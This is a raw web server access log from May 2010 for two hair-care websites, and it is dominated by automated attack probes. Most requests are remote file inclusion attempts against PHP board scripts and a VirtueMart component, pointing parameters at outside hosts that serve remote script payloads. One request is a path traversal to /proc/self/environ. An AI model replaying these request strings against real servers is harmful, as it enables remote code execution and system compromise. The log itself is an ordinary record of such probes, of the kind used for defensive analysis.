173.160.141.237 - - [23/May/2010:18:43:46 -0700] "GET /logs/access_100322.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.mainviolin.com/images/.log/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:18:45:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5031 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
79.174.72.137 - - [23/May/2010:18:45:35 -0700] "GET /logs/access_100322.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.mainviolin.com/images/.log/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [23/May/2010:18:46:12 -0700] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [23/May/2010:18:46:12 -0700] "GET /logs/access_100510.log%20%20//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [23/May/2010:18:46:12 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [23/May/2010:18:47:09 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [23/May/2010:18:47:09 -0700] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [23/May/2010:18:47:09 -0700] "GET /logs/access_100510.log%20%20//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.160.141.237 - - [23/May/2010:18:47:20 -0700] "GET /logs/access_100125.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.mainviolin.com/images/.log/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.174.72.137 - - [23/May/2010:18:49:22 -0700] "GET /logs/access_100125.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.mainviolin.com/images/.log/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:18:51:35 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12902 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
114.108.151.149 - - [23/May/2010:18:53:08 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [23/May/2010:18:53:09 -0700] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [23/May/2010:18:53:09 -0700] "GET /logs/access.log//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [23/May/2010:18:54:03 -0700] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [23/May/2010:18:54:03 -0700] "GET /logs/access.log//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [23/May/2010:18:54:03 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [23/May/2010:18:57:07 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5654 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:03:16 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:03:16 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:03:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:03:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:03:17 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:03:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:03:49 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:03:49 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:19:04:17 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13691 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:04:48 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:04:48 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:04:48 -0700] "GET /logs/access_091123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:04:48 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:04:48 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:04:48 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:04:51 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:04:51 -0700] "GET /logs/access_091123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:04:51 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:04:51 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:04:51 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:04:51 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:04:57 -0700] "GET /logs/access_091130.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:04:59 -0700] "GET /logs/access_091130.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:07:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:07:43 -0700] "GET /logs/access_100118.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:07:43 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:07:43 -0700] "GET /logs/access_100322.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:07:43 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:07:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:07:43 -0700] "GET /logs/access_100322.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:07:43 -0700] "GET /logs/access_100118.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:08:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:08:56 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:08:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:09:13 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:09:13 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:09:13 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:13:16 -0700] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:13:20 -0700] "GET /logs/access_091102.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:13:38 -0700] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:13:43 -0700] "GET /logs/access_091102.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:14:36 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:14:36 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:14:36 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:14:37 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:14:37 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:14:37 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:15:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:15:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:15:55 -0700] "GET /logs/access_091026.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:16:02 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:16:02 -0700] "GET /logs/access_091026.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:16:02 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:16:08 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:16:08 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:16:08 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.108.66.144 - - [23/May/2010:19:16:20 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:19:16:23 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:16:23 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:19:16:23 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.95.58.209 - - [23/May/2010:19:19:48 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
212.95.58.209 - - [23/May/2010:19:19:49 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:20:55 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:20:55 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:20:55 -0700] "GET /logs/access_100111.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:21:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:21:42 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:21:43 -0700] "GET /logs/access_100111.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:21:44 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:21:44 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:21:44 -0700] "GET /logs/access_100111.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:22:21 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:22:21 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:22:21 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:23:09 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:23:09 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:23:09 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:23:12 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:23:12 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:23:12 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [23/May/2010:19:23:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13422 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
